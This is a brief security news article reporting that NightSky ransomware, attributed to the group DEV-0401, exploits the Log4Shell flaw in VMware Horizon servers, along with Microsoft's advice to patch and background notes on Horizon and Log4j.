NightSky Ransomware, first discovered in December last year, is reportedly targeting VMware Horizon servers through the Apache Log4J Shell vulnerability. And information is out that a Chinese hacking group dubbed DEV-0401 linked to Hafnium group is behind the development and distribution of the NighSky malware.
Microsoft has taken a note of the situation and issued a warning on Monday this week that all network admins should take a note of new campaign and should fix the Log4Shell vulnerability on their VMware Horizon servers as quickly as possible.
The Satya Nadella led company concluded that the same hacking group, i.e. DEV-0401, was also involved in spreading other ransomware variants such as AtomSilo, Rook and LockFile.
Interestingly, NightSky is using phishing tactics and impersonating renowned company domains like Sophos, Trend Micro, NVIDIA and Rogers to spread its malicious tentacles and in UK it is targeting private entities by mimicking an email sent by UKās NHS.
Note 1- Vmware Horizon servers are used to gain app and desktop virtualization in the cloud, allowing the users to gain the benefits through a dedicated client or a web browser.
Note 2- On December 9th,2021 a zero day vulnerability was reported to Microsoft by Alibaba Cloud Security team that involved arbitrary code execution in Apache Log4j stream and was strategically described as Log4Shell vulnerability.
